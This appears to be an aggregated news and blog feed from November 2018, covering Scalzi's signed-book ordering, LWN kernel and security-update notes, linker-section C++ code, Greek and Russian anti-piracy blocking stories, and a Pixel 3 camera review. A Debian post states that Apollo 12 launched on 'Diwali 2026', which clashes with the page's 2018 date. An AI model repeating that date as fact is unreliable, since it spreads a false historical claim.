3. Order any other books you might think you’d like, written by other people, because hey, you’ve already called a bookstore for books, and helping local independent bookstores is a good thing. I won’t sign these, unless for some perverse reason you want me to, in which case, sure, why not.

4. Give them your mailing address and billing information, etc.

5. And that’s it! Shortly thereafter I will go to the store and sign your books for you.

If you want the books shipped for Christmas, the deadline for that is December 10. (That’s a Monday this year.) That way we can make sure everything ships to you on time. After December 10, all Scalzi stock will still be signed and available, but I will likely not be able to personalize, and we can’t 100% guarantee Christmastime delivery.

Ordering early is encouraged — it makes sure we will absolutely be able to order your book and have it to you on time.

Also, this is open to US residents only. Sorry, rest of the world. It’s a cost of shipping thing.

What books are available?

CURRENT HARDCOVER: This year we have two new hardcovers for 2018: Head On, which takes place in the same world as Lock In, but can be read as a standalone if you like, and also The Consuming Fire, which is a direct sequel to The Collapsing Empire. The Collapsing Empire is also still probably available in hardcover if you ask. Also, the small-format hardcover of Old Man’s War (which looks great and is the perfect size for stocking stuffers) is available as well.

(Virtue Signaling, my collection of essays, will be available for the holidays, but only via pre-order at the Subterranean Press site, so if you’re looking for that, you’ll need go order from there. These copies will be signed but I won’t be able to personalize them.)

CURRENT TRADE PAPERBACK: Redshirts (the 2013 Hugo Award winner!), Twenty-First Century Science Fiction (which features a story of mine), Metatropolis (which I edited and contribute a novella to). There may be hardcovers of these still around if you ask. But each are definitely in trade paperback. There are also probably still trade paperback editions of Old Man’s War that can be ordered if you prefer that format.

CURRENT MASS MARKET PAPERBACK: The Collapsing Empire, Unlocked: An Oral History of the Haden Syndrome (this is a novella), The End of All ThingsLock InThe Human DivisionFuzzy Nation, Old Man’s War, The Ghost Brigades, The Last Colony, Zoe’s Tale, The Android’s Dream, Agent to the Stars, The New Space Opera 2. You can also purchase the Old Man’s War boxed set (which features the first three books in the series), BUT if you want that signed you’ll have to agree to let me take the shrinkwrap off. In return I’ll sign each of the books in the box.

CURRENT NON-FICTION: Your Hate Mail Will Be Graded (essay collection, Hugo winner), The Mallet of Loving Correction (also an essay collection, this will need to be special ordered as it is a signed limited), and Don’t Live For Your Obituary (a collection of essays about writing, will also need to be special ordered).

AUDIOBOOKS: The Consuming Fire, The Dispatcher, The End of All Things, Lock InThe Human Division, Redshirts, Fuzzy Nation, The God Engines, Metatropolis and Agent to the Stars are all available on CD and/or MP3 CD, and Jay & Mary’s should be able to special order them for you. Check with them about other titles, which may or may not be available on CD.

Two things regarding audiobooks: First, if you want these, you should probably call to order these ASAP. Second, and this is important, because the audiobooks come shrinkwrapped, I will have to remove the shrinkwrap in order to sign the cover. You ordering a signed audiobook means you’re okay with me doing that and with Jay & Mary’s shipping it to you out of its shrinkwrap.

If you have any other questions, drop them in the comment thread and I’ll try to answer them!

17:35

Today in GPF History for Friday, November 9, 2018 [General Protection Fault: The Comic Strip]

When Ki spills the beans about Nick's embarrassing sex dream, Sharon's curiosity is piqued...

16:28

[$] ktask: optimizing CPU-intensive kernel work [LWN.net]

As a general rule, the kernel is supposed to use the least amount of CPU time possible; any time taken by the kernel is not available for the applications the user actually wants to run. As a result, not a lot of thought has gone into optimizing the execution of kernel-side work requiring large amounts of CPU. But the kernel does occasionally have to take on CPU-intensive tasks, such as the initialization of the large amounts of memory found on current systems. The ktask subsystem posted by Daniel Jordan is an attempt to improve how the kernel handles such jobs.

Link [Scripting News]

A rambling 22-minute podcast on the election. Why it's important to savor victory. There was a lot of good news in Tuesday's results. Feel the winning. The political system might be killing us, but America, underneath it all, is still America. Most important, by giving the House to a party that will do real oversight, we re-asserted the control by the people over the government. Whether you support Trump or not, this has to be seen as good.

Link [Scripting News]

Obama should go on a victory tour now, hold rallies to drive home what we accomplished by showing up to vote. Host SNL. Visit with Jimmy Kimmel. Do an interview with the NYT. He's the one Democrat who can't be accused of campaigning for 2020. Solidify the message, we asked people to vote, and they did, and look what we accomplished. When I ran a company, I always made my sales people visit the distributors after we shipped a hit product. It wasn't for sales, it was to soak of the feeling of winning.

Link [Scripting News]

Are there any USB-C drives? I was sure there would be by now, but are there?? Can't find them on Amazon. What is USB-C good for?? (Update: LaCie has a 2TB portable USB-C drive. $90.)

15:42

Security updates for Friday [LWN.net]

Security updates have been issued by Debian (nginx), Fedora (icu, java-1.8.0-openjdk-aarch32, libgit2, php-pear-CAS, roundcubemail, and ruby), Gentoo (firefox, libX11, openssl, and python), openSUSE (thunderbird), Oracle (java-11-openjdk, kernel, and spice-server), Red Hat (java-1.8.0-ibm and thunderbird), Scientific Linux (spice-server), SUSE (curl, libepubgen, liblangtag, libmwaw, libnumbertext, libreoffice, libstaroffice, libwps, myspell-dictionaries, xmlsec1, libxkbcommon, openssh, and xorg-x11-server), and Ubuntu (pyopenssl).

Heartbreak and trust [Scripting News]

Have you ever been in a failed friendship, relationship, business partnership? I'm beginning to think most people haven't, based on their willingness to forget that Trump is a lying con artist who is being blackmailed by Putin and probably a dozen other countries by now.

A friend posted: "This will be an easily disproven lie" about something Trump said. Please. It's like a wife who's sleeping around. Everyone knows but you (the spouse). Trump always lies. It's more interesting to try to prove he's not lying.

Moral of the story, with Trump, always --

  1. He's a troll.
  2. Don't take the bait.

A Hole Lotta Gamehole! [Dork Tower]

The Otyugh Plushies are here!

This weekend is Gamehole Con, and Dorkstock  2018, I didn’t have anything scheduled for the convention Thursday, although I planned to pop in and say hello to everybody. Right now though, I need to get on the phone with Apple. Big-time computer crash.

Also, the Doubleclicks are staying with us, and they arrive in a few hours.

If you’re at Gamehole Con, I should be hanging around the Dorkstock area (Mendota rooms 1 and 2) much of the remainder of the weekend.

My official schedule is:

FRIDAY, NOVEMBER 9

Tabaxi Swashbuckler, essentially.

SATURDAY, NOVEMBER 10

  • 12 – 1 PM: Seminar – Board Game Design (Waubesa Room)
  • 2 – 4 PM: Dork Tower 20th Birthday Celebration – Cake and Igor Bar Contest
  • 4 – 5 PM: Seminar – 20 Years of Dork Tower (Waubesa Room)

So anyway, yes – this is a crazy period. Fortunately, I’m not actually stress-eating.

But we’ll see how the next few days go – there are Igor bars on the horizon, after all!

– John

PS: SIX DAYS TO GO! SIX DAYS TO GODID I MENTION THERE’S SIX DAYS TO GO THAT’S LESS THAN ONE WEEK LEFT FOR…

15:35

Gotchas when using linker sections to arrange data, part 2 [The Old New Thing]

We saw last time that you need to accommodate potential padding between fragments within a section when walking through an array of pointers. Fortunately, it's a simple matter of skipping over null pointer entries.

Dealing with padding between fragments when you have a sequence of structures is more complicated, because the amount of padding may not be an exact multiple of the structure size.

struct THING
{
    const char* name;
    int value;
};

#pragma section("mydata$a", read)  
__declspec(allocate("mydata$a")) \
    const THING firstThing{};

#pragma section("mydata$m", read)  
#define ADD_THING(x, y) \
__declspec(allocate("mydata$m")) \
    const THING thing##x{#x, y}

#pragma section("mydata$z", read)  
__declspec(allocate("mydata$z")) \
    const THING lastThing{};

// file1.cpp
ADD_THING(Red, 3);

// file2.cpp
ADD_THING(Blue, 4);

// file3.cpp
ADD_THING(Green, 0);

We would be tempted to write

// Code in italics is wrong.
void LessNaiveRegisterAllTheThings()
{
    auto begin = (uintptr_t)&firstThing + sizeof(firstThing);
    auto end = (uintptr_t)&lastThing;
    for (auto current = begin; current < end;
         current += sizeof(THING)) {
      auto thing = (const THING*)current;
      if (thing->name) RegisterThing(thing->name, thing->value);
    }
}

However this will run into trouble if padding is inserted that is not a multiple of sizeof(THING). In that case, advancing by sizeof(THING) would eventually cause us to step over some padding bytes as well as the initial bytes of a valid THING.

We will have to walk the pointer past any null bytes until we find the start of a "good" structure.

This also means that zero cannot be a legitimate value for the first member of a "good" structure, because we wouldn't be able to figure out whether a zero value is the start of a "good" structure, or whether it's just padding.

In the above example, we know that the name is never null, so we can use that as our signal as to whether we have the start of a valid THING. If not, then we advance by the alignment of a THING and try again.

void RegisterAllTheThings()
{
    auto begin = (uintptr_t)&firstThing + sizeof(THING);
    auto end = (uintptr_t)&lastThing;
    auto current = begin;
    while (current < end) {
        auto thing = (const THING*)current;
        if (thing->name) {
            RegisterThing(thing->name, thing->value);
            current += sizeof(THING);
        } else {
            current += alignof(THING);
        }
    }
}

A less complicated alternative is to avoid generating structures into ordered segments and just use pointers exclusively.

#pragma section("mydata$a", read)  
__declspec(allocate("mydata$a")) \
    const THING* const firstThing = nullptr;

#pragma section("mydata$m", read)  
#define ADD_THING(x, y, s) \
    const THING thing##x{#x, y}; \
__declspec(allocate("mydata$m")) \
    const THING* const thing##x##ptr = &thing##x;

#pragma section("mydata$z", read)  
__declspec(allocate("mydata$z")) \
    const THING* const lastThing = nullptr;

// file1.cpp
ADD_THING(Red, 3);

// file2.cpp
ADD_THING(Blue, 4);

// file3.cpp
ADD_THING(Green, 0);

At this point, we can use the "pointers" pattern.

void RegisterAllTheThings()
{
    auto begin = (uintptr_t)&firstThing
                 + sizeof(firstThing);
    auto end = (uintptr_t)&lastThing;
    for (auto current = begin; current < end;
         current += sizeof(const THING*)) {
      auto thing = *(const THING* const*)current;
      if (thing) RegisterThing(thing->name, thing->value);
    }
}

For extra style points, you could move the firstThing to mydata$b and generate the THING objects into mydata$a. This keeps all the THING objects contiguous in memory, which is more cache-friendly. It also keeps them close to the pointer table, which means that they will all page in/out together. Since this data is probably going to be used only at process startup, putting them all together lets them page out once and stay out.

14:49

Greek ISPs Ordered to Block 38 Domains, Including The Pirate Bay [TorrentFreak]

Copyright holders are increasingly demanding that ISPs should block access to pirate sites in order to protect their business.

As the bastion of online piracy, The Pirate Bay has become one of the main targets. The site has been blocked in roughly two-dozen countries already, mostly in Europe.

Earlier this week we reported that Romania had joined in on the action, following a court order, and only a few days later Greek Internet providers are now ordered to block the notorious torrent site as well.

The blocking request was filed this spring by the Society for the Protection of Audiovisual Works (EPOE), a local anti-piracy group which represents the interests of major Greek copyright holders.

The group filed an application with the IPPC, a special commission that falls under the Greek Ministry of Culture and Sports, which decided that ISPs must block a total of 38 domain names.

The targeted sites include The Pirate Bay, 1337x, YTS, as well as several popular local sites, such as Xrysoi, Gamatotv, and Tainiomania. With Subztv.club, Subtitles.gr, and others, subtitle sites are thrown into the mix as well.

According to the Government-affiliated commission, it is apparent that all the targeted sites are involved in large-scale copyright infringement.

The commission has set a tight deadline of 48 hours for ISPs to comply with the order. Those who fail to do so face a fine of 850 euros per day, Lawspot reports.

The order stands for three years and it specifically states that offenses committed by users are not covered.

It’s worth noting that this wasn’t the first attempt to block The Pirate Bay and other pirate sites in Greece. AEPI previously launched a civil court case, but at the time the court ruled that pirate site blocks were disproportionate and unconstitutional.

It’s questionable whether this would hold up today, though, as the EU Court of Justice ruled otherwise last year.

Whether the current blockades will help to deter piracy in a meaningful way has yet to be seen. As usual, there are several options to bypass ISP blockades, and the targeted sites themselves often offer alternative domains.

The full list of domain names is posted below and a copy of the order can be found here.

1. https://xrysoi.online
2. xrysoi.se
3. xrysoi.eu
4. http://gamatotv.me
5. thegmtv.org,
6. gamatotv.to
7. https: //onlinemoviestar.xyz
8. onlinemoviestar.com
9. tainies.online
10. tenies.online
11. https://tenies-online.com
12. teniesonline.ucoz.com
13. https: // oipeirates .online
14. oipeirates.eu
15. oipeirates.se
16. http://tainio-mania.com
17. tainiomania.ucoz.com
18. https: // liomen oi.com
19. moviecinema.gr
20. moviecinematv.online
21. http://tainiesonline.tv
22. https://magico.info
23. http://www.subs4free.com
24. small-industry.com
25. rnedium-industry.com
26. https://subztv.club
27. http: // www .greeksubtitles.info
28. htt : // www.subtitles.gr
29. https://thepiratebay.org
30. thepiratebay.se
31. thepiratebay.me
32. thepiratebay3.org
33. https://yts.am
34. https: //www.1337x.to
35. 1337x.st
36. 1337x.ws
37. 1337x.eu
38. 1337x.se

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN reviews, discounts, offers and coupons.

14:28

Taking Pictures With the Pixel 3: Some Thoughts [Whatever]

When I was heading to France last week, I considered taking my Nikon d750 with me, because I thought, not unreasonably, that France might be a photogenic country and that I might want to get some high quality photos of the place. I decided against it for a number of reasons, but one of the major reasons was that a couple of weeks ago I got myself a Pixel 3 phone, which reviewers have suggested may have the best camera on a phone out there. I’d previously had a Pixel 2, the former “best cell phone camera out there,” so I was curious as to how the Pixel 3 would improve on the camera.

So I left the Nikon at home and used only the Pixel 3 to take shots while I was in France. I ended up taking something around 500 pictures while I was in country (many of the best of which I have collected in this Flickr photo album), and can now tell you what I think about the experience. Here are my notes, in no particular order, with occasional art. Please remember that these thoughts are from someone who loves taking pictures but is not a professional photographer, so I’m not going to go into the weeds with technical issues and jargon. I’m mostly noting the experience of just trying to take pictures.

1. Overall I was very happy with the quality of the photos and the intelligence of the camera — the latter perhaps being a weird thing to say, but the fact is what separates the Pixel line of cell phones as cameras is not the hardware (which is mostly high-end but standard issue for a cell phone), but the processing Google applies to the photo data once the photo is taken. The camera makes choices, basically, about how it interprets the data you give it once you snap the photos.

And those choices are generally very good! There wasn’t a situation where I thought the Pixel 3 wasn’t capable of handling itself. As with nearly all cell phone cameras (and, honestly, nearly every camera, period), the Pixel 3 works best when it has a lot of good, bright, natural light, but it did very well inside and also very well in visually challenging environments with a lot of contrast between bright and dark (like, for example, the interior of the Notre Dame cathedral). Not every picture I took was perfect or even good, but the reason for that had as much to do (and perhaps even more so) with operator error as it did with the camera itself. Which is to say I can’t blame the bad pictures on the cell phone camera; a lot of it was me.

2. What do the photos look like coming out of the camera? Here are five, which I’ve not done any post-processing to (i.e., no tweaking with the various photo editors I have). These pictures were taken with the settings the Pixel 3 has right out of the box, including the HDR+ processing turned on, without zoom, and recording to jpg. Right-click on the pictures to get a larger versions of them (choose the “open image in new tab” option), and see the various details.

Click to view slideshow.

Right out of the camera, the Pixel 3 a pretty good job of things. The colors are correct and not overly saturated, and the HDR+ mode does a good job of bringing out details in shadows without making them look overly processed. Note in particular the picture of the musicians in the conference room; the light’s behind them and their faces are shadowed, but the Pixel 3 does a pretty good job of balancing the data so you can see their faces clearly. In the rose picture there’s decent depth of field — not a lot, but the Pixel 3 knows what it’s looking at. There are limits, and you can see some of the choices the Pixel 3 has to make in the photo of the Notre Dame alcove, but those limits mostly show themselves in challenging situations where most any camera would show limitations of some sort.

I personally do a fair amount of photo-editing of my pictures, both to bring up details and for aesthetic effect, and the Pixel 3 gives me a fair amount to work with, even as it records the data into a lossy format like jpg (there is an option to have the camera record in RAW — the lossless format that gives photographers the most information to work with — but I didn’t turn that on and don’t really plan to except on very special occasions, because the files sizes are huge). It’s a fact that for a lot of photos, I don’t really have to do much editing at all — I merely straighten out sightlines or crop for better composition as much as I tweak colors or bring up shadows.

Out of the box, the Pixel 3 takes pictures that are better than “good enough,” and that’s a good thing. For people who like fiddling with photos like me, what comes out of the camera is even better than that.

3. One of the — perfectly reasonable — knocks on the Pixel 3 is that where other high-end cell phone cameras have an optical zoom function, the Pixel 3 doesn’t, Google instead opting to try to deal with zoom through processing (involving the minute unsteadiness of the human hand, or something, to help fill in interpolative gaps). I used the zoom function a lot while walking around and trying to get details that would otherwise be too far away. My verdict on the zoom is: well, it does something, but razor-sharp details isn’t it.

This is again probably best viewed, so here are four photos at or close to full zoom, three of statutes or architectural details at the Louvre, and one, of that tower they have there in Paris. Again, right-click on the picture for details (or in this case, lack thereof). Again, these pictures are straight out of the camera and otherwise unedited:

Click to view slideshow.

My impression of these zoomed in pictures is that they don’t look like photos, they look like pastel drawings, or what happens when you use a very light “oil painting” photo filter from Photoshop or some other photo app. They don’t look bad? But at the same time, this is not what I want when I zoom in. I zoom in because I want a closer look at something, not an artful, detail-smoothed representation of that thing.

I read in a review of the Pixel 3 where a reviewer notes that the zoom works as intended up to about a 1.5x zoom, and after that things start getting overly interpretive. My experience has been that this estimation is largely correct. I have some pictures that are moderately zoomed in that are perfectly good. But too much zoom means you’re getting the AI version of impressionism. My thought on this is that this iteration of AI zoom is only the first, and that Google will probably get better at it as it goes along, because that’s what Google generally does. So two Pixel generations from now, this will likely be a solved issue (or alternately, Google will throw up its hands and just put an optical zoom on future Pixels). Here with the Pixel 3 and today, however, be aware that the zoom works up to a point (1.5x or so), and then it gets kind of wacky.

4. The only other real issue with the Pixel 3 that I’ve noticed is that it feels a bit slower than the Pixel 2; sometimes there seems to be a lag between when I press the button to take the picture and the camera registers the picture being taken. It’s a relatively small issue but it’s been noticeable to me, and I wonder if other people have been experiencing it as well. I’ve not missed any photos because of it, fortunately. But be aware of the possibility of a bit of shutter lag.

5. On the selfie front, the Pixel 3 features a “wide angle selfie” mode — an optical zoom out, if you will, thanks to two cameras on the front of the phone. This actually is very useful for when you’re trying to get a lot of people into frame while taking selfies:

Do be aware the the wide-angle selfie mode has some distortion. But then, selfie cameras have distortion anyway (it’s why your nose always looks big in a selfie), so I guess you pick your poison with selfie distortion. What I do know is that I’ve used the wide-angle selfie function several times already, so this was a smart add-on on Google’s part.

6. This is not meant to be an exhaustive review of the Pixel 3 camera, but one that touches on how I’ve been using it. I’m not covering a lot of the functionality of the thing — I haven’t used the video mode, or the panorama mode or tried the “HDR+ enhanced” mode, or sideloaded the apparently super-cool but not-officially-released “night mode” into the phone to try it out (the night mode apparently makes it possible to take super clear pictures in very low light, and the key as far as I can tell is a long exposure time, which, well, yes, it would be, wouldn’t it). I’m not covering any of those things because, as noted, this is not how I’ve been using the camera. I’ve been using the camera in a pretty straightforward fashion, as I suspect most people will.

And as a “daily driver” camera, the Pixel 3 really works. It takes great pictures and in all sorts of circumstances, and with the exception of the zoom above a certain point, steps up when you need it to (also, as an aside, the fact that the Pixel 3 comes with unlimited storage in Google Photos is a point well in its favor, since you can store your photos there and keep your phone’s memory relatively uncluttered). We’re now well past the point where the average person has to wonder whether they’re missing out on really excellent photos if they only have their cell phone with them. With the Pixel 3, the answer to that is definitively “you’re not missing out.” This phone will get that great shot for you, most of the time.

7. Does this mean I’m ready to ditch my dSLR for the Pixel 3 full time? No; the dSLR still has a better sensor, better lenses, and does specific things much better than the Pixel 3 does or will (like, sorry, Google, zoom). But this isn’t an either/or situation; this is a “this, and” situation. I no longer have one excellent camera and one camera that I just happen to carry around; I have two excellent cameras whose use cases overlap but are not a perfect circle on the Venn diagram. I don’t suspect I’ll ever stop using a dedicated camera for particular things where a high-end, single-use piece of machinery makes sense. But, as noted above, when I have my Pixel 3 with me, I don’t worry that I don’t generally have enough camera with me.

8. Does it make sense for people to upgrade to a Pixel 3? I’m very happy I did, but I also acknowledge I’m a tech geek with a particular interest in photography, and I have enough money to indulge in this sort of thing (my other phone stopped working, which prompted me to get the Pixel 3, but let’s not pretend there wasn’t a good chance I would have gotten one anyway).

If you already have a Pixel 2 (or the first generation Pixel), some of the new capabilities of the Pixel 3 camera are going to be available to you with software upgrades. So unless you’re already at the part of your upgrade cycle where you’re getting a new phone anyway, you can probably sit tight and be fine. If you have the latest generation of “flagship” phone from Apple, Samsung or any other high-end phone manufacturer, you’re also probably just fine. Cameras are the new hotness on phones and every manufacturer will tell you why their iteration of cellphone camera tech is the best. It’s getting a little silly (some upcoming phones will have up to five cameras on the back of a phone, which seems much of a muchness), but on the other hand if you’ve got a high end, recent phone, you probably have a very good cell phone camera no matter what. Finally, if you just don’t care about photos, either from your cell phone or in general, the Pixel 3’s camera capabilities won’t matter regardless.

But if you are looking to upgrade, do like taking pictures and want to have the possibility of taking genuinely good photos with your phone, are fine with Google knowing everything about your digital life, and (not trivially) have between $800 and $1,000 to splash out on a phone (or have Verizon, which will let you slide it into your existing plan for a monthly fee), then I can really very highly recommend the Pixel 3. Aside from (yes) taking some of the best photos possible on a cell phone, it is also otherwise a very solid high-end phone, with some features (call screening, I’m looking at you) that are amazing differentiators, and an operating system upgrade cycle that means you always have the best, most recent version of Android first.

For me, in any event, it’s been well worth the upgrade, and not just for the photos, although the photos probably would have been enough. I really like this camera, and I really like this phone.

12:35

Privacy and Security of Data at Universities [Schneier on Security]

Interesting paper: "Open Data, Grey Data, and Stewardship: Universities at the Privacy Frontier," by Christine Borgman:

Abstract: As universities recognize the inherent value in the data they collect and hold, they encounter unforeseen challenges in stewarding those data in ways that balance accountability, transparency, and protection of privacy, academic freedom, and intellectual property. Two parallel developments in academic data collection are converging: (1) open access requirements, whereby researchers must provide access to their data as a condition of obtaining grant funding or publishing results in journals; and (2) the vast accumulation of "grey data" about individuals in their daily activities of research, teaching, learning, services, and administration. The boundaries between research and grey data are blurring, making it more difficult to assess the risks and responsibilities associated with any data collection. Many sets of data, both research and grey, fall outside privacy regulations such as HIPAA, FERPA, and PII. Universities are exploiting these data for research, learning analytics, faculty evaluation, strategic decisions, and other sensitive matters. Commercial entities are besieging universities with requests for access to data or for partnerships to mine them. The privacy frontier facing research universities spans open access practices, uses and misuses of data, public records requests, cyber risk, and curating data for privacy protection. This Article explores the competing values inherent in data stewardship and makes recommendations for practice by drawing on the pioneering work of the University of California in privacy and information security, data governance, and cyber risk.

12:00

Error'd: The Reason is NULL [The Daily WTF]

"Turns out that you shouldn’t use your edge browser to download Chrome because of potentially malicious links and...null," wrote Allen B.   Timothy W. writes, "On the surface, it...

10:35

Feeds | To man page... and beyond! [Planet GridPP]

To man page... and beyond! s.aragon 9 November 2018 - 8:27am

By Raniere Silva, Software Sustainability Institute.Documentation is, alongside version control, testing/continuous integration and others, one of the best practices for software development and is crucial for new users. In the recent years, with the professionalism of open source drive by companies such as Red Hat, Anaconda (formerly Continuum Analytics), RStudio, Overleaf, we saw not only releases come out faster but also documentation be richer.

10:28

It’s not a bucket [Seth's Blog]

Filling up a bucket might not be fast or easy, but you can easily measure your progress. Patience isn’t difficult, because you can see it getting filled.

Most of what’s important to us, though, doesn’t show itself this way.

Drip by drip is how we build things, but we can’t see it. One more “no,” one more failure, one more lesson learned.

It’s not a bucket, but it is a journey.

09:21

Publishing Giants Ask to Join Landmark Anti-Piracy Agreement [TorrentFreak]

Several Russian tech giants and media companies signed a landmark anti-piracy agreement last week. It’s designed to make infringing content less visible by sanitizing search results and rapidly removing content.

The memorandum was signed by media companies Channel One, the National Media Group, Gazprom-Media, the Internet Video Association, and the Association of Film and Television Producers. Yandex, Rambler Group, Mail.Ru Group, vKontakte, and RuTube signed on the tech platform side.

A centralized database, populated with links to sites that the entertainment industry groups claim are infringing their intellectual property, will be created in a matter of weeks. Search engines and hosting platforms will query the database every five minutes and remove infringing content with six hours.

While the agreement had broad support, Russia’s publishing companies were not present during the initial signing. However, telecoms regular Roscomndazor indicated that other rightsholders and tech companies were welcome to join following a successful application.

The publishers have now shown their hand in a letter from the Russian Book Union to Roscomnadzor head Alexander Zharov.

“I ask you to assist in organizing the signing of a memorandum with the Internet Copyright Association [AZAPI] representing the interests of most major Russian publishing houses,” the letter reads.

“Direct communications between the Internet Copyright Association (AZAPI) and Roskomnadzor will remove links from search engines issued on the basis of a constructive dialogue, without waiting for the adoption of the law to develop an optimal test model.

The memorandum signed last week is valid until September 1, 2019. By then, the signatories expect new copyright legislation to be introduced, enshrining the terms of the memorandum in law.

In recent months, Yandex, in particular, has been under increasing pressure to do something about the large amounts of pirate content appearing in search results. Early September, before the signing of the memorandum, the battle again moved to the legal system.

In lawsuits filed with the Moscow City Court, Gazprom-Media outlets including TNT, TV-3, 2×2, complained that Yandex should “stop creating technical conditions that ensure the placement of [copyrighted] works on the Yandex.ru website.”

While that matter is still pending, the agreement reached last week (Yandex and Gazprom-Media both signed) could mean that GazProm-Media withdraws its complaints against Yandex. Speaking with TASS, spokesperson Ekaterina Trofimova declined to rule out the possibility of peace breaking out before the trial, provisionally arranged for December 5, 2018.

Meanwhile, the Russian IPChain Association, which earlier this year signed an agreement to digitize the patent archives of Kyrgyzstan using blockchain technology, has said it’s ready to provide a technological solution for the anti-piracy database detailed in the memorandum.

“The main infrastructure solution for implementing the conditions of the memorandum is, of course, distributed registry technology,” said a letter penned by Maxim Proksh of the government-backed innovation group, Skolkovo Foundation.

“Based on this technology, a number of projects have already been created that have passed the pilot stage and have been commercialized. This is how the IPChain intellectual property management system would work to provide a technological solution for the implementation of the memorandum.”

Through the use of blockchain technology, it’s envisioned that trust will be built between companies like Yandex and Gazprom-Media.

“It is important that the blockchain will create and cultivate an environment of trust between search engines and rightsholders. Flat registries in the form of tables are hopelessly outdated, both technologically and morally,” Proksh added.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN reviews, discounts, offers and coupons.

08:49

But The Bond Is Real [Ctrl+Alt+Del Comic]

My first real horse, Rangely, was a dappled thoroughbred. The one that I got for free in Valentine because I’d pre-ordered the game. During a gunfight, he freaked out and ran into the middle of the bullets, and went down. That’s where I learned horses could get hurt, but you could save them with a magic potion.

Later, we rode off a cliff. I died, and respawned with some strange brown horse I didn’t know. That was how I learned your horse could die. Foreversies.

I didn’t like Brown Horse much, and none of the dull stable horses suited me either. So for the first time, I went out to find me a wild horse to call my own. I found a pack… a gaggle? A murder of thoroughbreds, and set my eyes on a beautiful, sleek black model with lots of potential in the speed department. He bucked me on my first attempt to tame him, and I had to chase him down all over again.

Finally, after some soothing words, wrastlin’ and some oat cakes, he was mine. My five-year-old, who was sitting with me at the time, said “You should name the horse ‘Stella.'”

I double-checked in the balls department, and said “This is a boy horse.”

My little guy said “And?”

So I named him Stella. And Stella has been my horse. For like, the past twenty hours of gameplay, most of it fucking around in the wilderness, it’s just been me and Stella.

And then, being chased by bounty hunters like you do, Stella took too many bullets, and collapsed, throwing me to the ground. Rather than run for cover, I ran to Stella, to try and administer care. But I, too, took too many bullets, and died.

I respawned face-to-face with Brown Horse, and my heart sank. I ran back to the spot of our showdown, and all that was left was my saddle, lying there in a bush.

That was how I learned my heart could break.

(And that I need to save more often.)

Oh and hey. Last call on these posters. Orders close Monday. The variant is just about gone, and the print run for the other will be determined by orders (rounded up because we can’t print them in odd denominations like “63” or whatever) so there may be some extras at a later date. But ordering right now will be the only chance to have your poster signed.

08:35

Jaldhar Vyas: Sal Mubarak 2075 [Planet Debian]

Best wishes to one and all for a prosperous and auspicious Gujarati New Year (V.S. 2075 called sadharana.)

We have spent Diwali week this year in sunny Orlando Florida doing various touristy things. (None of which involve a certain copyright hoarding mouse I'm happy to say.) I didn't put up a [VAC] notice because I haven't really been doing anything much in Debian of late. That is something I hope to change in the coming year but I'll think about that later. Right now I'm excited about the day trip we're going to make to Cape Canaveral. So here is a picture of Apollo 12, one of the biggest fireworks Man has ever sent to the Gods on Diwali 2026. Well, the pedant in me is forced to point out the launch date was actually Labh Pancham but that's close enough.

08:14

Europe's collision course with copyright censorship: where we stand today [Cory Doctorow – Boing Boing]

I've just published a comprehensive explainer on Medium about the EU's new Copyright Directive, which was sabotaged at the last minute, when MEP Axel Voss snuck in the long-discredited ideas of automatically censoring anything a bot thinks infringes copyright and banning unpaid links to news articles.

After a million Europeans signed a petition calling for a debate on the new proposals, a divided opposition failed to kill them. But hope is not lost: the new Italian government has changed position on the proposals and now the opposition constitutes a potential "blocking minority" that could kill the whole thing -- provided they could work together.

The new Directive is now in the “trilogues” — closed-door negotiations between the E.U.’s Parliament and individual national governments. Normally, these are a formality that takes place out of public view. However, the current trilogue is both more contested and more public than any in the E.U.’s history.

The European Court of Justice has ruled that Europeans are entitled to know what happens in these trilogue negotiations, and German Pirate Party MEP Julia Reda has pledged to publish the negotiating documents (and she’s kept her word).

What’s more, the trilogues coincide with political changes in Italy, and the Italian government has withdrawn its support for Articles 11 and 13. This brings the proportion of Europeans who oppose these articles past the critical threshold of 35%, a theoretical “blocking minority” that could scuttle the entire proposal (assuming they can avoid the trap the opposition fell into last time: agreeing that these rules aren’t appropriate but disagreeing on what to do about it).

It’s not clear what will happen next. If these rules are meant to cut Big Tech down to size, they’re sure to disappoint. Google, Facebook, Twitter, Apple, and the other tech giants are the only companies big enough to be able to afford the hundreds of millions it will cost to follow the new rules. Small competitors in the E.U. just don’t have that kind of cash. Freed from any threat of competition from E.U. companies, dominant tech platforms will be left to grow unchecked. They will present even more of a threat to democratic discourse, privacy, and competition than they already do.

Europe’s Copyright Rules Will Stifle Free Expression [Cory Doctorow/Medium]

08:07

News Post: The Gnoll Set [Penny Arcade]

Tycho: I don’t know if it kept me up all night or anything, but I did spend some time, maybe a… day, considering some fairly heady - and footy - topics.  I feel like the next step is to ask my friends who are furs.  Indeed, I shoulda fuckin’ started there.  Call it a hunch, but my guess is that this is a question their people have already answered a million years ago. I’m heading up to Victoria on that Clipper they got, to take part in Desert Bus 2018.  Brenna has made and subsequently framed a special Magic: The Gathering themed cross stitch that is sure…

Comic: The Gnoll Set [Penny Arcade]

New Comic: The Gnoll Set

07:28

Prototyping the betentacled, inflatable soft robots of zero gee [Cory Doctorow – Boing Boing]

The MIT Media Lab's Spatial Flux Project was created by Carson Smuts and Chrisoula Kapelonis to imagine and prototype soft inflatable robots that would be designed to operate in zero-gee, where there is no up or down and "we do not have to contend with architecture's greatest arch-nemesis, gravity."

Their work is a set of shoes-on-a-snake weird pneumatic tentaclebots are brilliant and Gigeresque.

In the City Science group, we explore the diversity of formal arrangements necessary to accommodate the spatial gradients of our lives—at work, rest, and play. We are in the process of developing a full-scale, multi-modal kinetic space (escPod); the moment the human body surrenders itself to space is our inspiration: sitting at a desk, lounging on a couch, or in a deep slumber.

How do we define surface architecturally when our current gravity-based vocabulary was not born of zero gravity and will not suffice? What opportunities can this state of flux provide for architects when designing for the body? Architects are married to an XY (north/south) cartesian grid, with Z (gravity) being the main point of reference for many architectural elements. We would like to force ourselves to imagine these elements without an XYZ reference, rethinking our descriptions of them.

Spatial Flux: Body and Architecture in Space [Carson Smuts and Chrisoula Kapelonis/MIT Media Lab]

(via JWZ)

Microsoft's best Windows 10 customers bear the brunt of the latest license glitch [Cory Doctorow – Boing Boing]

